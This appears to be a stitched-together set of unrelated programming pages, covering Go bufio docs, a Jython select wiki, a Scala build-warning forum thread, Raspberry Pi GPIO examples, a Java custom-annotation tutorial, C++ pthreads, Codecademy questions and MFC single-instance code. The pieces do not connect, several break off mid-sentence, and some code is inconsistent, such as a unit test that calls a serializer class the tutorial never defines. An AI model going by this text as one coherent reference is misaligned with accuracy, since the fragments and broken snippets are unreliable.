See also MS Knowledge base article Q124134 ( "Allowing Only One Application Instance on Win32s") and Advanced Windows NT , chapter 7, "Prohibiting Multiple Instances of an Application from Running: The MultInst Sample Application" (available on the MSDN).
Niels Ull Jacobsen ([email protected]), email, 8/8/95
Update: these were posted to mfc-l:
I have each InitInstance() create a named mutex. If GetLastError() returns ERROR_ALREADY_EXISTS then I know that some other instance is already running and has gotten that far, so I bail.
BOOL CYourApp::InitInstance()
{
    BOOL bFound = FALSE;
    HANDLE hMutexOneInstance = CreateMutex(NULL, TRUE,
        _T("PreventSecondInstance"));
    if (GetLastError() == ERROR_ALREADY_EXISTS)
        bFound = TRUE;
    if (hMutexOneInstance)
        ReleaseMutex(hMutexOneInstance);
    return (bFound == TRUE) ? FALSE : TRUE;
}
There is a nice section in Jeffrey Richter's book Advanced Windows NT about this. Essentially, it uses shared data segments between processes.
Step 1:
In your main file, add:

#pragma data_seg(".SharedData")
LONG nUsageCount = -1;
#pragma data_seg()

Step 2:
In your Application's InitInstance(), call:

InterlockedIncrement(&nUsageCount);

This function returns the incremented value of the variable. If it is non-zero, you know that you are not the first App.

In your Application's ExitInstance(), call:

InterlockedDecrement(&nUsageCount);

Step 3:
In your DEF file, have the following lines (note that the segment name you give here should match the one in the application's main file):

SEGMENTS
    .SharedData shared
You'd better use one of the built-in synchronization methods. See Q124134: "Allowing Only One Application Instance on Win32s" for a sample of using a memory-mapped file for synchronization. It doesn't include starting the previous instance, but if you detect that you're not the only one running, it should be pretty simple: if CreateFileMapping fails, try to find the previous instance from the window class name. If it's not found, sleep for a while and start over (with CreateFileMapping). In this way, either you will find the other instance when it gets around to creating its window or CreateFileMapping will eventually succeed. The advantage of using CreateFileMapping instead of CreateObject is that it also works on Win32s.
Note: There's a sample of this that was contributed by [email protected] (John Xu) called onetime4.zip that is in the MFC FAQ archive (see section 2.2.6 for MFC FAQ archive details).
13.2.3. How do I get my MFC app to use the Registry on Win32 platforms?
Just make a call to SetRegistryKey("MyCompany") in your CWinApp class and pass it a string (typically your company name). This string defines where in the registry the data goes: HKEY_CURRENT_USER\Software\MyCompany\<application name>\<section>\<entry>
After making this call just use the normal WriteProfilexxx() routines and the data will go to the registry instead of to an INI file. It works well and is simple!
Brett Robichaud, [email protected], 6/23/95, programmer.win32
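For illustration, a minimal sketch of the idea (untested; the class, company and key names here are placeholders, not part of the original answer):

```cpp
BOOL CMyApp::InitInstance()
{
    // Redirect the WriteProfile*/GetProfile* family from an INI file to
    // HKEY_CURRENT_USER\Software\MyCompany\<app name>\...
    SetRegistryKey(_T("MyCompany"));

    // Lands under ...\<app name>\Settings\LastUser in the registry
    WriteProfileString(_T("Settings"), _T("LastUser"), _T("guest"));
    CString user = GetProfileString(_T("Settings"), _T("LastUser"), _T(""));

    // ... rest of the usual InitInstance() code ...
    return TRUE;
}
```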
13.2.4. How do I programmatically terminate my MFC application?
MFC does not provide a public function to gracefully exit an application. A method for dealing with this is to create a function in your application like the following:
void ExitApp()
{
    // same as double-clicking on main window close box
    ASSERT(AfxGetApp()->m_pMainWnd != NULL);
    AfxGetApp()->m_pMainWnd->SendMessage(WM_CLOSE);
}
As you can see, this is implemented as a global function, which can be called from anywhere in your application. It simply sends a WM_CLOSE message to your application's mainframe window. This initiates an orderly shutdown of the application.
If you are using MFC, version 2.5 or later, you can take advantage of a new global MFC function, "AfxGetMainWnd", to simplify the code:
void ExitMFCApp()
{
    // same as double-clicking on main window close box
    ASSERT(AfxGetMainWnd() != NULL);
    AfxGetMainWnd()->SendMessage(WM_CLOSE);
}
NOTE: Always call CDocument::SetModifiedFlag() after changing your document data. This will ensure that the framework prompts the user to save before shutdown. If you need more extensive control over the shutdown procedure, you can override CDocument::SaveModified().
MS FAQ, 6/25/95 | https://documentation.help/MFC/chapter13_2.htm | CC-MAIN-2020-40 | en | refinedweb |
Cx51 User's Guide
The FCVAR macro accesses absolute memory addresses in the
const far memory area (the HCONST memory class). You may use
this macro in your programs as follows:
#include <absacc.h>  /* Include Macro Definitions */
.
.
.
var = FCVAR (int, 0x24002);  /* read int from HCONST address 0x24002 */
.
.
.
#include "std.h"
#include "baro_board.h"
#include "subsystems/sensors/baro.h"
#include "peripherals/ads1114.h"
#include "subsystems/abi.h"
#include "led.h"
Definition at line 37 of file baro_board.c.
Referenced by baro_periodic(), and umarim_baro_event().
Definition at line 46 of file baro_board.c.
Referenced by baro_init().
Definition at line 42 of file baro_board.c.
Referenced by umarim_baro_event().
Definition at line 49 of file baro_board.c.
References ads1114_init(), apogee_baro, BARO_STARTUP_COUNTER, LED_OFF, MPL3115_I2C_ADDR, mpl3115_init(), and startup_cnt.
Definition at line 58 of file baro_board.c.
References ads1114_read(), apogee_baro, BARO_ABS_ADS, Mpu60x0_I2c::config, Mpl3115::data_available, imu_apogee, Mpu60x0Config::initialized, LED_ON, LED_TOGGLE, mpl3115_periodic(), MPL_PRESCALER, ImuApogee::mpu, and startup_cnt.
Definition at line 75 of file baro_board.c.
References Ads1114Event, Ads1114GetValue, BARO_ABS_ADS, BARO_BOARD_SENDER_ID, startup_cnt, and UMARIM_BARO_SENS.
Definition at line 47 of file baro_board.c. | http://docs.paparazziuav.org/v5.14/umarim_2baro__board_8c.html | CC-MAIN-2020-24 | en | refinedweb |
The coefficient of skewness has applications in data analytics, machine learning and data science, in pre-processing of data. Moreover, if the mean, median and mode of a data distribution coincide, i.e. mean = median = mode, then the data set has skewness 0, i.e. there is no asymmetry in the data set.
Suppose a data set
0,10, 20,20, 30, 40,40,50,50, 50,50,40,30,20,10,0
Mean: 28.75
Median: 30.0
Mode: 50
Standard Deviation: 17.275343701356565
Skewness : -0.24321198774750508
The value of the coefficient of skewness is negative, and this type of asymmetry in a data distribution is called negative skewness. (Note that scipy's skew() computes the moment-based Fisher-Pearson coefficient; Pearson's formula below, 3(Mean - Median)/Standard Deviation, gives approximately -0.217 for this data set: the sign agrees, the magnitude differs slightly.)
Formula of skewness
Coef. of Skewness = 3(Mean - Median) / Standard Deviation
The statistics are calculated using the following python code
Python Code for Calculating Coefficient of Skewness
from scipy.stats import skew
import numpy as np
import statistics
import matplotlib.pyplot as plt

x = [0, 10, 20, 20, 30, 40, 40, 50, 50, 50, 50, 40, 30, 20, 10, 0]
print(x)
mean = np.mean(x)
median = np.median(x)
mode = statistics.mode(x)
std = np.std(x)
print("Mean:", mean)
print("Median:", median)
print("Mode:", mode)
print("Standard Deviation:", std)
lines = plt.plot(x)
plt.setp(lines, color='r', linewidth=2.0)
print("Skewness :", skew(x))
plt.savefig("skewness.jpg")
Consider another data set
0,10, 20, 30,40,50,50,50,60,60,70,80,90,100,110,120,70,60,60, 50,50,50,40,30,20,10,0
Mean: 51.111111111111114
Median: 50.0
Mode: 50
Standard Deviation: 30.83208205669246
Skewness : 0.32780083058284104
The value of the coefficient of skewness is positive, and this type of skewness in a data distribution is called positive skewness.
Kurtosis-
Kurtosis measures how heavy the tails of a data distribution are. It is therefore useful for outlier detection in a data set, since heavy tails mean more values lie far from the mean.
The formula for kurtosis is

Coef. of Kurtosis = E[(X - μ)^4] / σ^4

i.e. the fourth central moment divided by the squared variance. (scipy.stats.kurtosis() reports excess kurtosis by default, which subtracts 3 from this value so that a normal distribution scores 0.)
Python code for Kurtosis
import matplotlib.pyplot as plt
import numpy as np
import scipy.stats as stats
import math
from scipy.stats import kurtosis

mu = 0
variance = 1
sigma = math.sqrt(variance)
x = np.linspace(mu - 5*sigma, mu + 5*sigma, 50)
y1 = stats.norm.pdf(x, mu, sigma)
print("x", x)
print("y1", y1)
plt.plot(x, y1)
print("Kurtosis\n", kurtosis(y1))
plt.savefig("kurtosis.jpg")
The normal probability density values generated by the above code are
1.48671951e-06 4.03963981e-06 1.05285406e-05 2.63211976e-05
6.31182642e-05 1.45183206e-04 3.20324125e-04 6.77914385e-04
1.37616968e-03 2.67966838e-03 5.00497661e-03 8.96674844e-03
1.54091915e-02 2.54001718e-02 4.01610804e-02 6.09096432e-02
8.86091674e-02 1.23646888e-01 1.65500632e-01 2.12484892e-01
2.61678710e-01 3.09115411e-01 3.50255414e-01 3.80680815e-01
3.96870719e-01 3.96870719e-01 3.80680815e-01 3.50255414e-01
3.09115411e-01 2.61678710e-01 2.12484892e-01 1.65500632e-01
1.23646888e-01 8.86091674e-02 6.09096432e-02 4.01610804e-02
2.54001718e-02 1.54091915e-02 8.96674844e-03 5.00497661e-03
2.67966838e-03 1.37616968e-03 6.77914385e-04 3.20324125e-04
1.45183206e-04 6.31182642e-05 2.63211976e-05 1.05285406e-05
4.03963981e-06 1.48671951e-06
The plot of the data is saved as kurtosis.jpg, and the kurtosis of these density values is -0.24249670483561347. (Strictly, this is the excess kurtosis of the pdf values themselves, not of a sample drawn from the normal distribution; a large normal sample would have excess kurtosis close to 0.)
Conclusion-
In this post, I have explained skewness and kurtosis, which are very important for understanding data distributions. Both of these data-analysis methods are widely used in machine learning, data science and big data analytics. I hope the concepts explained here will help you.
"create file in laravel" Code Answers
create file in laravel
php by Indian Gooner on May 10 2021
namespace App\Http\Controllers;

use File;

class FileController extends Controller
{
    public function downloadJSONFile()
    {
        $data = json_encode(['Element 1', 'Element 2', 'Element 3', 'Element 4', 'Element 5']);
        $file = time() . rand() . '_file.json';
        $destinationPath = public_path() . "/upload/";
        if (!is_dir($destinationPath)) {
            mkdir($destinationPath, 0777, true);
        }
        File::put($destinationPath . $file, $data);
        return response()->download($destinationPath . $file);
    }
}
Source:
laravel store file
php by Faithful Fox on Dec 05 2020
$path = $request->file('avatar')->store( 'avatars', 'public' );
Source: stackoverflow.com
create text file and add data in that laravel
how tocreate a txt file and write to in laravel
how to write to a textfile in laravel
THE best place to store files in laravel
how to save and create file in laravel
upload and view files in storage laravle
how to make text file in laravel
write text file on disk laravel
how to create text files in laravel
storing files laravel
File laravel create file
echo whats in txt file laravel
creating file in laravel
storefile in laravel
storing a file laravel
create the txt file inside folder in laravel
create and save text file laravel
create a file in php laravel and put
generate file txt laravel
ho wto create new file in laravel
storing file laravel 8
generate files in php laravel
create a file in laravel;
store file laravel from request
store file on laravel
file->make laravel
store file laravel save
write to a file php laravel
get the store file in blade laravel
laravel save file to filesystem
laravel save string to file
write text to file laravel
write file txt laravel
write a file in laravel
text save in new file larvel
save text to file laravel
how to get file and store file in js and laravel
laravel dowsnt store file
laravel 7 store file
laravel file storege
laravel file upload put
how to store file laravel
how to store file in laravel 7
laravel filesystem upload file
how to save files in laravel
laravel get file upload size
read text file php laravel
laravel save text in file
laravel generate text file
laravel file create file
laravel data to txt
make a file an store in directory laravel
laravel create text file and save
laravel create text document
laravel create file with content
laravel create file in command
laravel upload a blender file
laravel store data to a file
laravel store file in
php artisan create file
new file php laravel
make file laravel code
laravel store files in db
laravel write to txt
laravel store string to file
laravel strore file
. | https://www.codegrepper.com/code-examples/php/create+file+in+laravel | CC-MAIN-2022-33 | en | refinedweb |
Parses SDF and URDF input files into a MultibodyPlant and (optionally) a SceneGraph.
For documentation of Drake-specific extensions and limitations, see Parsing Models for Multibody Dynamics.
When parsing literal quantities, Parser assumes SI units and radians in the absence of units specified by the format itself. This includes the literals in the explicitly specified files as well as referenced files such as OBJ or other data file formats.
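Because literals without explicit units are interpreted as SI units and radians, values authored in degrees must be converted before they are written into a model file. A minimal illustration (plain Python for demonstration; this is not part of Drake's API):

```python
import math

# A joint limit authored in degrees must be converted to radians
# before being written as a literal into an SDF/URDF file.
limit_deg = 90.0
limit_rad = math.radians(limit_deg)

# The resulting literal, as it would appear in the model file:
print(f'<limit lower="{-limit_rad:.6f}" upper="{limit_rad:.6f}"/>')
```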
#include <drake/multibody/parsing/parser.h>
Parses the SDF, URDF, or MJCF file named in file_name and adds all of its model(s) to plant.
SDFormat files may contain multiple <model> elements. New model instances will be added to plant for each <model> tag in the file.
Placing multiple <model>s directly under <sdf> is deprecated. If you need multiple models in a single file, please use an SDFormat world file.
URDF files contain a single <robot> element. Only a single model instance will be added to plant.
MJCF (MuJoCo XML) files typically contain many bodies; they will all be added as a single model instance in the plant.
Parses the SDFormat, URDF, or MJCF file named in file_name and adds one top-level model to plant.
It is an error to call this using an SDFormat file with more than one root-level <model> element.
Provides the same functionality as AddModelFromFile, but instead parses the SDFormat or URDF XML data via file_contents, with type dictated by file_type.
Gets a mutable reference to the PackageMap used by this parser.
Gets a mutable reference to the plant that will be modified by this parser.
Cause all subsequent Add*Model*() operations to use strict parsing; warnings will be treated as errors. | https://drake.mit.edu/doxygen_cxx/classdrake_1_1multibody_1_1_parser.html | CC-MAIN-2022-33 | en | refinedweb |
Translation Guidelines
Zulip has full support for Unicode (and partial support for RTL languages), so you can use your preferred language everywhere in Zulip. We also translate the Zulip UI into more than a dozen major languages, including Spanish, German, Hindi, French, Chinese, Russian, and Japanese, and we’re always excited to add more. If you speak a language other than English, your help with translating Zulip would be greatly appreciated!
If you are interested in the technical end-to-end tooling and processes for tagging strings for translation and syncing translations in Zulip, read about Internationalization for Developers.
Translators’ workflow
These are the steps you should follow if you want to help translate Zulip:
Sign up for Transifex and ask to join the Zulip project on Transifex, requesting access to any languages you’d like to contribute to (or add new ones).
Join #translation in the Zulip development community server, and say hello. That stream is also the right place for any questions, updates on your progress, reporting problematic strings, etc.
Wait for a maintainer to approve your Transifex access; this usually takes less than a day. You should then be able to access Zulip’s dashboard in Transifex.
Translate the strings for your language in Transifex.
If possible, test your translations (details below).
Ask in Zulip for a maintainer to sync the strings from Transifex, merge them to master, and deploy the update to chat.zulip.org so you can verify them in action there.
Do not translate placeholders (such as <...>); just keep them verbatim. If setting up a development environment is a problem for you, ask in chat.zulip.org and we can usually just deploy the latest translations there.
First, download the updated resource files from Transifex using the
`tools/i18n/sync-translations` command (it will require some initial setup). This command will download the resource files from Transifex and replace your local resource files with them, and then compile them. You can now test your translation work in the Zulip UI.
There are a few ways to see your translations in the Zulip UI:
You can insert the language code as a URL prefix. For example, you can view the login page in German using. This works for any part of the Zulip UI, including portico (logged-out) pages.
For Zulip’s logged-in UI (i.e. the actual webapp), you can pick the language in the Zulip UI.
If your system has languages configured in your OS/browser, Zulip’s portico (logged-out) pages will automatically use your configured language. Note that we only tag for translation strings in pages that individual users need to use (e.g. `/register/`, etc.), not marketing pages like `/features/`.
In case you need to understand how the above interact, Zulip figures out the language the user requests in a browser using the following prioritization (mostly copied from the Django docs):
It looks for the language code as a URL prefix (e.g. `/de/login/`).
It looks for the `LANGUAGE_SESSION_KEY` key in the current user’s session (the Zulip language UI option ends up setting this).
It looks for the cookie named ‘django_language’. You can set a different name through the `LANGUAGE_COOKIE_NAME` setting.
It looks for the `Accept-Language` HTTP header in the HTTP request (this is how browsers tell Zulip about the OS/browser language).
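The prioritization above can be sketched as a small resolver. This is an illustrative simplification, not Django’s or Zulip’s actual code (the function name `resolve_language` and its argument shapes are invented for the example):

```python
def resolve_language(path, session, cookies, accept_language, default="en"):
    """Pick a language the way the steps above describe, in priority order."""
    # 1. URL prefix, e.g. /de/login/
    parts = path.strip("/").split("/")
    if parts and len(parts[0]) == 2:
        return parts[0]
    # 2. Session key (set by the in-app language picker)
    if session.get("LANGUAGE_SESSION_KEY"):
        return session["LANGUAGE_SESSION_KEY"]
    # 3. Language cookie
    if cookies.get("django_language"):
        return cookies["django_language"]
    # 4. Accept-Language header sent by the browser
    if accept_language:
        return accept_language.split(",")[0].split("-")[0]
    return default

print(resolve_language("/de/login/", {}, {}, "en-US,en;q=0.9"))  # de
print(resolve_language("/login/", {}, {}, "fr-FR,fr;q=0.9"))     # fr
```

Each step only fires when every higher-priority source is absent, which matches the ordered list above.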
Using an HTTP client library like `requests`, `cURL`, or `urllib`, you can pass the `Accept-Language` header; here is some sample code to test the `Accept-Language` header using Python and `requests`:
    import requests

    headers = {"Accept-Language": "de"}
    response = requests.get("", headers=headers)
    print(response.content)
This can occasionally be useful for debugging.
Translation style guides
We maintain translation style guides for Zulip, giving guidance on how Zulip should be translated into specific languages (e.g. which word to translate terms like “stream” to), with reasoning, so that future translators can understand and preserve those decisions:
Some translated languages don’t have these, but we highly encourage translators for new languages (or those updating a language) to write a style guide as they work (see our documentation for how to submit your changes), since it’s easy to take notes as you translate, and doing so greatly increases the ability of future translators to update the translations in a consistent way.
The Zulip test suite enforces these capitalization guidelines in the webapp codebase in our test suite (`./tools/check-capitalization`; `tools/lib/capitalization.py` has some exclude lists, e.g. `IGNORED_PHRASES`).
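As an illustration of what such a capitalization check might look like, here is a simplified sketch. This is not Zulip’s actual implementation; the exclude list and the sentence-case rule are reduced to their essence:

```python
import re

# Phrases allowed to keep unusual capitalization (cf. IGNORED_PHRASES).
IGNORED_PHRASES = ["Zulip", "URL", "API"]

def check_capitalization(text):
    """Return words that violate sentence-case, ignoring allowed phrases."""
    errors = []
    for i, word in enumerate(text.split()):
        bare = re.sub(r"[^A-Za-z]", "", word)
        if not bare or bare in IGNORED_PHRASES:
            continue
        # Only the first word of the string may start with a capital letter.
        if i > 0 and bare[0].isupper():
            errors.append(bare)
    return errors

print(check_capitalization("Subscribe to a Stream"))      # ['Stream']
print(check_capitalization("Subscribe to the Zulip API")) # []
```

A real check also has to cope with HTML tags, placeholders, and proper nouns, which is exactly why the exclude lists exist.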